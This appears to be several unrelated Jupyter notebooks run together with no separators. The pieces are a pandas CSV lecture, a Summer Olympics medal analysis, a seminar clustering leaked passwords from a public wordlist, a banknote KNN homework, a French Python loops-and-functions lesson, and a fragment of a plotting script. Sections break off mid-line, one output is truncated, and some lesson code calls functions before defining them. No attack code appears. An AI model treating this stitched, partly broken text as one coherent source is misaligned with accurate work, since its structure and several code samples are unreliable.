moderate-sized datasets. A common workflow is to read the dataset in, usually from an external file, then begin to clean and manipulate the dataset for analysis. In this lecture, I'm going to demonstrate how you can load data from a comma separated file and into a DataFrame.#Let's just jump right in and talk about comma-separated files. You've undoubtedly used these. Any Spreadsheet software like #Excel or Google sheets can save output in CSV format. It's a pretty loose as a format and it's incredibly lightweight, and #it's totally ubiquitous. #Now, I'm going to make a quick aside because it's convenient here. The Jupyter Notebooks use iPython as the kernel underneath #which provides convenient ways to integrate lower-level shell commands, which are programs run in the underlying operating #system. If you're not familiar with the shell, don't worry too much about this. But if you are, this is super handy for #integration of your data science workflows. I want to use one shell command here called "cat" for "concatenate", which just #outputs the contents of a file. In iPython, if we prepend the line with an exclamation mark, it will execute the remainder of #the line as a shell command. So let's look at that in the contents of a CSV file. !cat datasets/Admission_Predict.csv #!cat is for linux not windows #We see from the output that there's a list of columns, and that the column identifiers are listed at strings on the first line #of the file. Then, we have rows of the data, all columns are separated by commas. Now, there's lots of oddities with the CSV #file format, and there's no one agreed upon specification or standard. So you should be prepared to do a little bit of work #when you pull down CSV files to explore. But this lecture isn't focused on CSV files per se, and is more about Pandas #DataFrames. So let's jump into that. #Let's bring in Pandas to work with: import pandas as pd #Pandas makes it easy to turn a CSV into a DataFrame. We just call the read_csv () function. df = pd.read_csv('datasets/Admission_Predict.csv') #Note here we're not calling anything on the DataFrame, we're calling it on the Pandas module. Let's look at a few of the first #rows: df.head() #We notice that by default, the index starts with 0 while the students serial numbers starts from one. If you jump back to the #CSV output, you'll deduce the Pandas has created a new index. Instead, we can set the serial number as the index if we want to #by using the index_col: df = pd.read_csv('datasets/Admission_Predict.csv', index_col=0) df.head() #Notice that we have two columns, SOP and LOR, and probably not everybody knows what they mean. So let's change our column names #to make it more clear. In Pandas, we can use the rename() function. It takes a parameter called columns, and we need to pass in #a dictionary which are the keys of the old column name and the value of the corresponding new column name: new_df=df.rename(columns={'GRE Score':'GRE Score', 'TOEFL Score':'TOEFL Score', 'University Rating':'University Rating', 'SOP':'Statement of Purpose', 'LOR':'Letter of Recommendation', 'CGPA':'CGPA', 'Research':'Research', 'Chance of Admit':'Chance of Admit'}) new_df.head() #From the output, we can see that only the "SOP" has changed, but not "LOR". So why is that? So let's investigate this a bit. #First, we need to make sure we've got all the column names correct. We can use the columns attribute of the DataFrame to get a #list: new_df.columns #If we look closely at the output, we can see that there's actually a space right after "LOR" and a space right after "chance of #admit". So this is why our renamed dictionary does not work for LOR because the key that we used is just three characters #instead of four characters, "LOR ". #There's a couple of ways that we could address this. One way would be the change of column by including the space in the new #name: new_df=new_df.rename(columns={'LOR ': 'Letter of Recommendation'}) new_df.head() #So that works well, but it's a bit fragile. What if that was a tab instead of a space or two spaces? Another way is to create #some function that does the cleaning, and then tell renamed to apply that function across all of the data. Python comes with a #handy string function to strip white space called "strip()". When we pass this into rename, we pass the function as the mapper #parameter, and then indicate whether the axis should be the columns, or the index(row labels). So here's an example: new_df=new_df.rename(mapper=str.strip, axis='columns') #So new_df equals new_df.rename. We pass in the mapper, and in this case we're passing in a reference to a function. So #str.strip. We're not calling the function, we're just passing a reference to that function, and Pandas will call it. We tell #the axis that we want it to call this on is across the columns not rows. Now, let's take a look at the results. new_df.head() #Now, we've got it. Both SOP and LOR had been renamed and chance of admit has been trimmed up. Remember though that the rename #function isn't modifying the DataFrame. In this case, df is the same as it always was. There's just a copy of new_df with the #change names: df.columnsSo if we do df.columns, we can see that those still include our columns that are poorly named with lots of extra white space. I'll be honest, these white spaces in column names, this is really common. You'll be doing this anytime you're importing a CSV having to tweak out extra white space.#We can also use the df.columns attribute by assigning it to a list of column names which will directly rename the columns. #This will directly modify the original DataFrame, and it's very efficient especially when you have a lot of columns and you #only want to change a few. This technique is also not affected by subtle errors in the column names, a problem that we just #encountered. With a list, you could just use the list index to change a certain value or use a list comprehension to change all #of the values. #So as an example, let's change all of the values of the column names to lowercase. So first, we need to get our lists: cols = list(df.columns) #So df.columns is actually an indexing variable, and I just want to convert it to a list. #Then, I'm going to write a little list comprehension. So I'll make col is equal to and then I start my list comprehension. In #there, I want to say x.lower.strip. So I'm going to convert X to lowercase, then call strip on it where x is a string and for x #and calls. cols = [x.lower().strip() for x in cols] #So we're just iterating over everything in cols. #Then, we just want to overwrite what is already in the.columns attributes df.columns=cols #then let's take a look at our results df.head()**Summer Olympics Data Analysis** 🔘 ***`Importing necessary Libraries`***import pandas as pd # for data analysis and manipulation import numpy as np # for faster access operations with arrays import matplotlib.pyplot as plt # for plotting graphs🔘 ***`Reading and displaying original data from the summer olympics csv file`***df= pd.read_csv("summer.csv") # df is short for 'data-frame'; # stores data from csv file in the form of data-frame df🔘 ***`Fetching only the first 5 records/rows from the dataset`***df.head()🔘 ***`Dimensions of the whole dataset`***df.shape🔘 ***`Analyzing presence of any NULL values in the dataset (column wise)`***df.isnull().sum()**Analysis and Insights from the dataset so far** **1. In how many cities Summer Olympics is held so far?**print("Answer :",len(df['City'].unique()), end="\n\n")Answer : 22**2. Names of all Cities with their Medal Counts in Summer Olympics**for city in df['City'].unique(): print (f"{city}: {len(df[df['City']==city])}", end="\n\n")Athens: 2149 Paris: 1396 St Louis: 470 London: 3567 Stockholm: 885 Antwerp: 1298 Amsterdam: 710 Los Angeles: 2074 Berlin: 875 Helsinki: 889 Melbourne / Stockholm: 885 Rome: 882 Tokyo: 1010 Mexico: 1031 Munich: 1185 Montreal: 1305 Moscow: 1387 Seoul: 1546 Barcelona: 1705 Atlanta: 1859 Sydney: 2015 Beijing: 2042**2.Which sport is having most number of GOLD MEDALS so far?(Top 5)**gold_medal = df[df.Medal=="Gold"] gold_medals_sports = gold_medal.groupby("Sport").count()["Medal"].sort_values(ascending=False).head() gold_medals_sports # Showing data in graphical form print() gold_medals_sports.plot(x='Sports', y='Gold Medals', kind='bar',ylabel = 'Number of Gold Medals', figsize = (10,5), title = 'Top 5 Sports with highest no. of Gold Medals', color = 'red')**3. Which sport is having most number of medals so far? (Top 5)**medals_sports = df.groupby('Sport').count()['Medal'].sort_values(ascending = False).head() medals_sports # Showing data in graphical form print() medals_sports.plot(x='Sports', y='Medals', kind='bar', ylabel = 'Number of Medals', figsize = (10,5), title = 'Top 5 Sports with highest number of Medals', color = 'grey')**4. Which Player has won the most number of Medals? (Top 5)**player_medals = df.groupby('Athlete').count()['Medal'].sort_values(ascending = False).head() player_medals # Showing data in graphical form print() player_medals.plot(x='Athlete', y='Medals', kind='bar', ylabel= 'Number of Medals', figsize = (10,5), title = 'Most Medals won by Athletes', color = 'green')**5. Which player has won the most number of GOLD MEDALS? (Top 5)**gold_medal = df[df["Medal"]=='Gold'] player_gold_medals = gold_medal.groupby("Athlete").count()["Medal"].sort_values(ascending= False).head() player_gold_medals #Showing data in graphical form print() player_gold_medals.plot(x='Athletes', y='Medals', kind='bar', ylabel= 'Number of Medals', figsize = (10,5), title = 'Most Gold Medals won by Athletes', color = 'brown')**6. In which year did India win its first Gold Medal in Summer Olympics?**df_gold = df[df["Medal"]=="Gold"] df_India = df_gold[df_gold['Country'] == 'IND'] print(f"Answer: {df_India['Year'].min()}",end = "\n\n")Answer: 1928**7. Which Event is most popular in terms of number of players? (Top 5)**event = df.groupby('Event').count()['Athlete'].sort_values(ascending = False).head() event # graphical representation print() event.plot(x='Event', y='Number of Players', kind='bar', ylabel= 'Number of Players', figsize = (10,5), title = 'Most popular events in Athletes', )**8. Which sport is having most Female Gold Medalists? (Top 5)**df_female = df_gold[df_gold['Gender'] == 'Women'] female_gold_sports = df_female.groupby('Sport')['Gender'].count().sort_values(ascending = False).head() female_gold_sports # graphical representation print() female_gold_sports.plot(x='Sport', y='Number of FemalePlayers', kind='bar', ylabel= 'Number of Female Players', figsize = (10,5), title = 'Nunber of Female Athletes in Top 5 Sports', color = 'indigo')Seminar 10. Clustering Hands-on practice Similar password detectionIn this assignment we will try to detect similar patterns in passwords that people use all over the internet.The input data is a collection of leaked passwords and it can be downloaded from here https://github.com/ignis-sec/Pwdb-Public/tree/master/wordlistsThe task is to try to describe the data in terms of clustering: what are the groups of passwords that look quite similar or have similar logic behind them?This seminar should be considered as a research: there are no correct answers, no points and no deadlines - just your time and your experiments with clustering algorithms.We suggest to start with the following steps:- download the data- check if your favourite password is in the database- build a distance matrix using Levenstein distance- apply DBSCAN- apply Agglomerative clustering and examine the dendrogram- experiment with hyperparameters and the distance function- look for more dependencies and password patternsimport numpy as np import re from pylev import levenshtein from sklearn.cluster import DBSCAN, KMeans import matplotlib.pyplot as plt words_1M = [] with open("data/ignis-1M.txt", "r") as file: for line in file: words_1M.append(line.strip()) words_1K = [] with open("data/ignis-1K.txt", "r") as file: for line in file: words_1K.append(line.strip()) words = np.array(words_1M[:1000]).reshape((-1, 1))Introduce a distance-matrix:import numpy as np from pylev import levenshtein X = np.zeros((words.shape[0], words.shape[0])) for i,x in enumerate(words[:, 0]): for j,y in enumerate(words[i:, 0]): X[i, i + j] = levenshtein(x, y) X[i + j, i] = X[i, i + j] plt.imshow(X, cmap="Purples") plt.show() eps = 2.0 min_samples = 4 db = DBSCAN(eps=eps, metric="precomputed", min_samples=min_samples).fit(X) labels = db.labels_ len(set(labels)) clusters = {} sizes = {} for label in set(labels): cluster = words[labels == label, 0] sizes[label] = len(cluster) clusters[label] = cluster sizes_list = np.array(sorted([(x, y) for x,y in sizes.items()], key=lambda x: x[1], reverse=True)) plt.title("Cluster sizes") plt.bar(sizes_list[:, 0], sizes_list[:, 1]) plt.show() n_top_clusters_to_plot = 1 sizes_to_plot = sizes_list[n_top_clusters_to_plot:, ] sizes_to_plot = sizes_to_plot[sizes_to_plot[:, 1] > min_samples] print("{} clusters cover {} passwords from {}".format( sizes_to_plot.shape[0], sum(sizes_to_plot[:, 1]), words.shape[0] )) for x in sizes_to_plot: print(x[1], clusters[x[0]][:8]) from scipy.cluster import hierarchy from scipy.spatial.distance import pdist condensed_X = pdist(X) linkage = hierarchy.linkage(condensed_X, method="complete") linkage.shape plt.figure(figsize=(16, 16)) dn = hierarchy.dendrogram(linkage) plt.show() from sklearn.cluster import AgglomerativeClustering cluster = AgglomerativeClustering(n_clusters=5, affinity='precomputed', linkage='complete') Y = cluster.fit_predict(X) from collections import Counter Counter(Y) words[Y == 4][:10] # !pip3 install -U strsimpy from strsimpy.weighted_levenshtein import WeightedLevenshtein def insertion_cost(char): return 1.0 def deletion_cost(char): return 1.0 def substitution_cost(char_a, char_b): if char_a == 't' and char_b == 'r': return 0.5 return 1.0 weighted_levenshtein = WeightedLevenshtein( substitution_cost_fn=substitution_cost, insertion_cost_fn=insertion_cost, deletion_cost_fn=deletion_cost) print(weighted_levenshtein.distance('Stting1', 'String1')) print(weighted_levenshtein.distance('String1', 'Stting1'))1.0Kmeans and embeddingsimport gensim.downloader list(gensim.downloader.info()['models'].keys()) word_embeddings = gensim.downloader.load("glove-wiki-gigaword-100") part_word_emb_names = [] part_word_emb_values = [] for word in words[:, 0]: if word in word_embeddings: part_word_emb_names.append(word) part_word_emb_values.append(word_embeddings[word]) len(words), len(part_word_emb_names) part_word_emb_names[:25] from sklearn.cluster import KMeans from sklearn.decomposition import PCA pca = PCA(n_components=2) pca_words = pca.fit_transform(part_word_emb_values) pca_words.shape plt.scatter(pca_words[:, 0], pca_words[:, 1]) plt.title("621 Embeddings PCA") plt.show() embeddings_clusters = KMeans(n_clusters=3).fit_predict(part_word_emb_values) Counter(embeddings_clusters) for i in range(len(set(embeddings_clusters))): plt.scatter(pca_words[embeddings_clusters == i, 0], pca_words[embeddings_clusters == i, 1], label=i) plt.legend() plt.title("621 Embeddings PCA") plt.show() for i in range(len(set(embeddings_clusters))): print(i) for word in np.array(part_word_emb_names)[embeddings_clusters == i][:5]: print(word) print("---")0 dragon football killer shadow master --- 1 ashley princess michael daniel charlie --- 2 123456789 password 15 1234 ---Question1bk = pd.read_csv('./data_banknote_authentication.csv') bk = bk.rename({'class':'Class'}, axis='columns') color = [] for c in bk.Class: if c == 0: color.append('Green') else: color.append('red') bk['Color'] = color bk0 = bk[bk.Class == 0] bk1 = bk[bk.Class == 1] print(bk0.describe()) print() print(bk1.describe()) print() print(bk.describe())variance skewness curtosis entropy Class count 762.000000 762.000000 762.000000 762.000000 762.0 mean 2.276686 4.256627 0.796718 -1.147640 0.0 std 2.019348 5.138792 3.239894 2.125077 0.0 min -4.285900 -6.932100 -4.941700 -8.548200 0.0 25% 0.883345 0.450063 -1.709700 -2.228250 0.0 50% 2.553100 5.668800 0.700605 -0.552380 0.0 75% 3.884450 8.691975 2.652925 0.423257 0.0 max 6.824800 12.951600 8.829400 2.449500 0.0 variance skewness curtosis entropy Class count 610.000000 610.000000 610.000000 610.000000 610.0 mean -1.868443 -0.993576 2.148271 -1.246641 1.0 std 1.881183 5.404884 5.261811 2.070984 0.0 min -7.042100 -13.773100 -5.286100 -7.588700 1.0 25% -3.061450 -5.810025 -1.357500 -2.458375 1.0 50% -1.806100 0.172775 0.373720 -0.661650 1.0 75% -0.541770 3.[...]Question2# Split data and pairplot ## bk0 x0 = bk0[['variance', 'skewness', 'curtosis', 'entropy']] y0 = bk0[['Class']] x0Train, x0Test, y0Train, y0Test = train_test_split(x0, y0, test_size=0.5, random_state=0) f0 = sns.pairplot(x0Train) f0.fig.suptitle("class 0") ## bk1 x1 = bk1[['variance', 'skewness', 'curtosis', 'entropy']] y1 = bk1[['Class']] x1Train, x1Test, y1Train, y1Test = train_test_split(x1, y1, test_size=0.5, random_state=0) f1 = sns.pairplot(x1Train) f1.fig.suptitle("class 1") # easy model f = plt.figure() f.set_size_inches(12,24) ## variance va = f.add_subplot(4,2,1) a0 = x0Train.variance a1 = x1Train.variance va.plot(a0, np.zeros_like(a0) + 0, '.', color = 'green') va.plot(a1, np.zeros_like(a1) + 0.1, '.', color = 'red') va.set_title('variance') vah = f.add_subplot(4,2,2) vah.hist(a0, color='green') vah.hist(a1, color = 'red', alpha=0.3) vah.set_title('variance') ## skewness sk = f.add_subplot(4,2,3) a0 = x0Train.skewness a1 = x1Train.skewness sk.plot(a0, np.zeros_like(a0) + 0, '.', color = 'green') sk.plot(a1, np.zeros_like(a1) + 0.1, '.', color = 'red') sk.set_title('skewness') skh = f.add_subplot(4,2,4) skh.hist(a0, color='green') skh.hist(a1, color = 'red', alpha=0.3) skh.set_title('skewness') ## curtosis cu = f.add_subplot(4,2,5) a0 = x0Train.curtosis a1 = x1Train.curtosis cu.plot(a0, np.zeros_like(a0) + 0, '.', color = 'green') cu.plot(a1, np.zeros_like(a1) + 0.1, '.', color = 'red') cu.set_title('curtosis') cuh = f.add_subplot(4,2,6) cuh.hist(a0, color='green') cuh.hist(a1, color = 'red', alpha=0.3) cuh.set_title('curtosis') ## entropy en = f.add_subplot(4,2,7) a0 = x0Train.entropy a1 = x1Train.entropy en.plot(a0, np.zeros_like(a0) + 0, '.', color = 'green') en.plot(a1, np.zeros_like(a1) + 0.1, '.', color = 'red') en.set_title('entropy') enh = f.add_subplot(4,2,8) enh.hist(a0, color='green') enh.hist(a1, color = 'red', alpha=0.3) enh.set_title('entropy') # Predict lable x = bk[['variance', 'skewness', 'curtosis', 'entropy']] y = bk[['Class']] xTrain, xTest, yTrain, yTest = train_test_split(x, y, test_size=0.5, random_state=0) yPredict = [] for v in xTest.variance: if v >= 0 : yPredict.append(0) else: yPredict.append(1) # True False tp = 0 tn = 0 fp = 0 fn = 0 acc = 0 for (p, t) in zip(yPredict, yTest.Class): if p == 0 and t == 0: tp += 1 elif p == 1 and t == 1: tn += 1 elif p == 0 and t == 1: fp += 1 elif p == 1 and t == 0: fn += 1 if p == t: acc = acc + 1 print("TP:{} FP:{} TN:{} FN:{} TPR:{} TNR:{} Accuracy:{}".format(tp, fp, tn, fn, tp/(tp + fn), tn/(tn + fp), acc / len(yPredict))) ## Confusion Matrix I choose # 0 is good 1 is bad temp = confusion_matrix(yTest, yPredict) print(temp) tn = temp[0][0] fn = temp[1][0] tp = temp[1][1] fp = temp[0][1] tpr = tp / (tp + fn) tnr = tn / (tn + fp) print('TPR = {}, TNR = {}, tp fp tn fn = {} {} {} {}'.format(tpr, tnr, tp, fp, tn, fn))Qestion3# KNN kList = [3,5,7,9,11] accuracy = [] for k in kList: knn = KNeighborsClassifier(n_neighbors=k) knn.fit(xTrain, yTrain) yPredict = knn.predict(xTest) accuracy.append(accuracy_score(yTest, yPredict)) plt.plot(kList, accuracy) print(accuracy) # k = 7 is optimal knn = KNeighborsClassifier(n_neighbors=7) knn.fit(xTrain, yTrain) yPredict = knn.predict(xTest) # True False tp = 0 tn = 0 fp = 0 fn = 0 acc = 0 for (p, t) in zip(yPredict, yTest.Class): if p == 0 and t == 0: tp += 1 elif p == 1 and t == 1: tn += 1 elif p == 0 and t == 1: fp += 1 elif p == 1 and t == 0: fn += 1 if p == t: acc = acc + 1 print("TP:{} FP:{} TN:{} FN:{} TPR:{} TNR:{} Accuracy:{}".format(tp, fp, tn, fn, tp/(tp + fn), tn/(tn + fp), acc / len(yPredict))) # BU ID 64501194 # Take 1 1 9 4 x = {'variance':[1], 'skewness':[1], 'curtosis':[9], 'entropy':[4]} x = pd.DataFrame.from_dict(x) ## my simple classifier yPredict = 1 print("my simple classifier: {}".format(yPredict)) ## for best knn knn = KNeighborsClassifier(n_neighbors=7) knn.fit(xTrain, yTrain) yPredict = knn.predict(x) print("knn(n=7): {}".format(yPredict))my simple classifier: 1 knn(n=7): [0]Les bouclesLes boucles sont un type de contrôle de flux dans un programme. Nous avons vu que **les alternatives permettent d'exécuter une ou plusieurs instructions lorsqu'une condition est vérifiée**. Les boucles quant à elles permettent de répéter une plusieurs instructions. La boucle `while`La boucle `while` permet d'exécuter une ou plusieurs instructions de manière repetée jusqu'à ce qu'une condition soit vérifiée.max_age = 30 age = 1 while age < max_age: # Tant que age < max_age, alors exécuter le code qui suit. print(f"L'age {age} est inférieur à {max_age}") age = age + 1L'age 1 est inférieur à 30 L'age 2 est inférieur à 30 L'age 3 est inférieur à 30 L'age 4 est inférieur à 30 L'age 5 est inférieur à 30 L'age 6 est inférieur à 30 L'age 7 est inférieur à 30 L'age 8 est inférieur à 30 L'age 9 est inférieur à 30 L'age 10 est inférieur à 30 L'age 11 est inférieur à 30 L'age 12 est inférieur à 30 L'age 13 est inférieur à 30 L'age 14 est inférieur à 30 L'age 15 est inférieur à 30 L'age 16 est inférieur à 30 L'age 17 est inférieur à 30 L'age 18 est inférieur à 30 L'age 19 est inférieur à 30 L'age 20 est inférieur à 30 L'age 21 est inférieur à 30 L'age 22 est inférieur à 30 L'age 23 est inférieur à 30 L'age 24 est inférieur à 30 L'age 25 est inférieur à 30 L'age 26 est inférieur à 30 L'age 27 est inférieur à 30 L'age 28 est inférieur à 30 L'age 29 est inférieur à 30Dans la boucle `while` il est important de mettre à jour la condition lorsque le code tourne autrement la boucle tourne indéfiniment. ```pythonmax_age = 30age = 1while age < max_age: print(f"L'age {age} est inférieur à {max_age}")``` Si j'enlève l'instruction `age = age + 1` alors, toutes les fois que la boucle tourne alors age < max_age. La condition st toujours vérifiée, donc l'instruction print s'exécutera indéfiniment.msg = input() msg = "" while not "bonjour" in msg: print("Bonjour") msg = input()BonjourLa boucle `for` En Python la boucle for itère sur les éléments d'une séquence (qui peut être une liste, une chaîne de caractères…), dans l'ordre dans lequel ils apparaissent dans la séquence.# Pour déclarer une liste cours = ["Economie", "Biologie", "Chimie"] type(cours) numero = "08-03-05-11" numero.split("-") type(numero) fruits = ["pomme", "ananas", "goyave", "mangue"] # Onn décalre une variable d'itération # Assignée à chaque élement de la séquence. # L'avantage c'est qu'on a pas besoin de savoir le nombre # d'élements qu'il y a dans la séquence for el in fruits: print(el) "Il a dit \"Bonjour\" " 'Il a dit "Bonjour" ' emails = ["", "", ""] # Obtenir les services de messagerie for mail in emails: print(f"Le service mail est : {mail.split('@')[1]}") print(f"Le prénom est : {mail.split('@')[0]}") "".split("@") mail = "".split("@") print(mail[0]) mail print(mail[1]) fruits = ("pomme", "ananas", "goyave", "mangue") # le type de la séquence n'est pas importante # list, tuple, dictionaire ... for el in fruits: print(el) print(el.split("o"))pomme ['p', 'mme'] ananas ['ananas'] goyave ['g', 'yave'] mangue ['mangue']La fonction `range()` nous permet de générer une séquence de nombre. Nous pouvons générer une séquence de nombres sur lesquels itérer.range(10) list(range(10)) # Exemple : générer une séquence de 20 nombres consécutifs # Range(n) crée une séquence de 0, n-1 élements list(range(1, 21)) # Nous pouvons choisir le début et la fin list(range(10, 25)) # ous pouvons itérer ainsi print(list(range(20))) for i in range(20): print(f"Le nombre actuel est {i}")[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19] Le nombre actuel est 0 Le nombre actuel est 1 Le nombre actuel est 2 Le nombre actuel est 3 Le nombre actuel est 4 Le nombre actuel est 5 Le nombre actuel est 6 Le nombre actuel est 7 Le nombre actuel est 8 Le nombre actuel est 9 Le nombre actuel est 10 Le nombre actuel est 11 Le nombre actuel est 12 Le nombre actuel est 13 Le nombre actuel est 14 Le nombre actuel est 15 Le nombre actuel est 16 Le nombre actuel est 17 Le nombre actuel est 18 Le nombre actuel est 19% : modulo Division et ne prend que la partie entière.4/2 4 % 2 # Si 4 est divisé par 2 on trouve un nombre entier 4/3 4%3 50/19 19 * .6315789473684212 x = 50 - 19 x = x- 19 print(x) 50 == 2 * 19 + 12 20 % 10 x = 20 x = x - 10 x = x - 10 print(x) 50%19 print(list(range(40))) print() for i in range(40): if i%2==0: print(f"Le nombre pair est {i}")[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39] Le nombre pair est 0 Le nombre pair est 2 Le nombre pair est 4 Le nombre pair est 6 Le nombre pair est 8 Le nombre pair est 10 Le nombre pair est 12 Le nombre pair est 14 Le nombre pair est 16 Le nombre pair est 18 Le nombre pair est 20 Le nombre pair est 22 Le nombre pair est 24 Le nombre pair est 26 Le nombre pair est 28 Le nombre pair est 30 Le nombre pair est 32 Le nombre pair est 34 Le nombre pair est 36 Le nombre pair est 38Application : calculs moyenne, variance, écart-type, covariance Données Soit la répartition de la taille des étudiants :tailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] somme = 0 n = 0 for taille in tailles: n = n+1 somme = somme + taille #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n print(f"La moyenne est {moyenne}") tailles = [1.90, 1.75, 0, 0, 1.88, 1.87, 2.04, 1.65, 1.77, 0, 1.78, 1.81, 1.79] somme = 0 n = 0 # Calculer la moyenne mais en excluant les 0 for taille in tailles: if taille != 0: n = n+1 somme = somme + taille #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n print(f"La moyenne est {moyenne}") print(f"Taille initiale de la liste : {len(tailles)}") print(f"Taille finale de la liste : {n}")La moyenne est 1.8239999999999998 Taille initiale de la liste : 13 Taille finale de la liste : 10**Calculer la moyenne :** Pour rappel la formule de la moyenne est ![](images/moyenne.jpg) **Calculer la variance :**Pour rappel la formule de la variance est: ![](images/variance-formula.png)tailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] # Proposition de Sarah somme = 0 n = 0 sommesqEM = 0 for taille in tailles: n = n+1 somme = somme + taille print() moyenne = somme / n print(f"La moyenne est {moyenne}") print() for taille in tailles : sqEM = (taille - moyenne)**2 #print(f"l'écart à la moyenne au carré est {sqEM}") sommesqEM = sommesqEM + sqEM #print(f"la somme des carrés des EM est {sommesqEM}") print() variance = sommesqEM / n print(f"la variance est {variance}")La moyenne est 1.8239999999999998 la variance est 0.009964**Calculer l'écart-type :** L'écart-type est égal à la racine carrée de la variance.from math import sqrt sd = variance ** 0.5 # standard deviation print(f"L'écart-type est égal à {sd}") 25 ** 0.5 == sqrt(25) tailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] poids = [95, 75, 70, 77, 103, 60, 71, 66, 80, 69] for x, y in zip(tailles, poids): print(x) print(y)1.9 95 1.75 75 1.88 70 1.87 77 2.04 103 1.65 60 1.77 71 1.78 66 1.81 80 1.79 69Fonctionstailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] somme = 0 n = 0 for taille in tailles: n = n+1 somme = somme + taille #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n print(f"La moyenne est {moyenne}") moyenne(tailles) moyenne(poids)Les fonctions c'est comme un bloc de code auquel on donne un nom.len(tailles) def moyenne(): tailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] somme = 0 n = 0 for taille in tailles: n = n+1 somme = somme + taille #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n print(f"La moyenne est {moyenne}") moyenne() moyenne() moyenne(tailles) def moyenne(donnees): """ Cette fonction calcule la moyenne d'une série de valeurs. """ somme = 0 n = 0 for valeur in donnees: n = n+1 somme = somme + valeur #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n print(f"La moyenne est {moyenne}")La fonction affiche la valeur de la moyenne mais ne la retourne pas encore. Nous ne pouvons pas assigner la valeur de la moyenne dans une variable.moyenne_tailles = moyenne(tailles) moyenne_tailles def moyenne(donnees): """ Cette fonction calcule la moyenne d'une série de valeurs. """ somme = 0 n = 0 for valeur in donnees: n = n+1 somme = somme + valeur #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n #print(f"La moyenne est {moyenne}") return moyenne moyenne_tailles = moyenne(tailles) moyenne_tailles moyenne tailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] n = len(tailles) moyenne_tailles = moyenne(tailles) sommesqEM = 0 for taille in tailles : sqEM = (taille - moyenne_tailles)**2 #print(f"l'écart à la moyenne au carré est {sqEM}") sommesqEM = sommesqEM + sqEM #print(f"la somme des carrés des EM est {sommesqEM}") print() variance = sommesqEM / n print(f"la variance est {variance}") # Variance : Proposition de Abdoulaye def variance(valeur_variance): somme = 0 n = 0 sommesqEM = 0 for var in valeur_variance: n = n+1 somme = somme + var print() moyenne = somme / n print(f"La moyenne est {moyenne}") print() for var in valeur_variance : sqEM = (var - moyenne)**2 print(f"l'écart à la moyenne au carré est {sqEM}") sommesqEM = sommesqEM + sqEM print(f"la somme des carrés des EM est {sommesqEM}") print() variance = sommesqEM / n print(f"la variance est {variance}") variance([1,2,3,4,5,8,7,8]) def variance(valeur_variance:list): """ Cette fonction calcule la variance d'une série de données. Prend en argument une séquence de valeur """ # Nous calculons n et la moyenne de la liste n = len(valeur_variance) moyenne_list = moyenne(valeur_variance) # Logique pour calculer la variance sommesqEM = 0 for var in valeur_variance : sqEM = (var - moyenne_list)**2 #print(f"l'écart à la moyenne au carré est {sqEM}") sommesqEM = sommesqEM + sqEM #print(f"la somme des carrés des EM est {sommesqEM}") variance_list = sommesqEM / n return variance_list variance(tailles) def variance(valeur_variance:list): """ Cette fonction calcule la variance d'une série de données. Prend en argument une séquence de valeur """ # Nous calculons n et la moyenne de la liste moyenne_list = moyenne(valeur_variance) # Logique pour calculer la variance # Variance = la moyenne des carrés - le carré de la moyenne carre_valeur_variance = [x**2 for x in valeur_variance] # List comprehension variance_list = moyenne(carre_valeur_variance) - moyenne_list **2 return variance_listNous avons aussi la distribution du poids des étudiants :valeurs = [2,3,4,5,6] [x**2 for x in valeurs] # List comprehension result = [] for x in valeurs: result.append(x**2) result variance(tailles) moyenne(tailles) moyenne([1,2,3,4,5,7,8,9,8,7,8,5,4,5,4,5,4,5,4]) moyenne() poids = [95, 75, 70, 77, 103, 60, 71, 66, 80, 69]Creates Figure 13 based on the .txt runtime info files returned by the MJP-Test.Basically an exact copy of ODERuntimePlots.py file with only the filenames/paths and some constants adapted to the MJP modelimport numpy as np import matplotlib import matplotlib.pyplot as plt import pandas as pd import math import os import seaborn from matplotlib import rc font = {'family' : 'DejaVu Sans', 'weight' : 'normal', 'size' : 12} rc('font', **font) nodelist=np.array([1,2,4,8,16]) workers_per_node = 48 datalist=[] filepath="/home/felipe/testresults/MJP/Juwels" for i in range(len(nodelist)): datalist.append(pd.read_csv( os.path.join(filepath, "MJPruntimeresultsN"+str(nodelist[i])+".txt"), delimiter = ", ", engine = 'python')) data1worker=pd.read_csv(os.path.join(filepath, "MJPruntimeresultsN0.txt"), delimiter = ", ", engine = 'python') pop_sizes = datalist[0].loc[datalist[0]['Look_ahead']==True]['Pop size'].values print(pop_sizes) meanslist = [] for i in range(len(nodelist)): meanslist.append(datalist[i].loc[datalist[0]['Look_ahead']==True]['Runtime Expectation'].values) meanslist.append(datalist[i].loc[datalist[0]['Look_ahead']==False]['Runtime Expectation'].values) nodelist = nodelist * 48 PPParray=np.zeros((len(nodelist),len(pop_sizes))) ORIarray=np.zeros((len(nodelist),len(pop_sizes))) #Statarray=np.zeros((len(nodelist),len(pop_sizes))) for i in range(len(nodelist)): PPParray[i,:]=meanslist[2*i] ORIarray[i,:]=meanslist[2*i+1] # Statarray[i,:]=meanslist[3*i+2] colors=["blue", "orange" ,"red", "yellow", "green", "purple"] #plt.plot(PPParray[0,:],pop_sizes,label=str(nodes[0])+" Cores", marker="o", markersize=5, color=colors[0]) for i in range(0,len(nodelist)): plt.plot(PPParray[i,:],pop_sizes,label=str(nodelist[i])+" W", marker="o", markersize=5, color=colors[i]) plt.plot(ORIarray[i,:],pop_sizes, marker="o", markersize=5, color = colors[i], linestyle="dotted") plt.plot([0],[10], label="Look Ahead", color = "black") 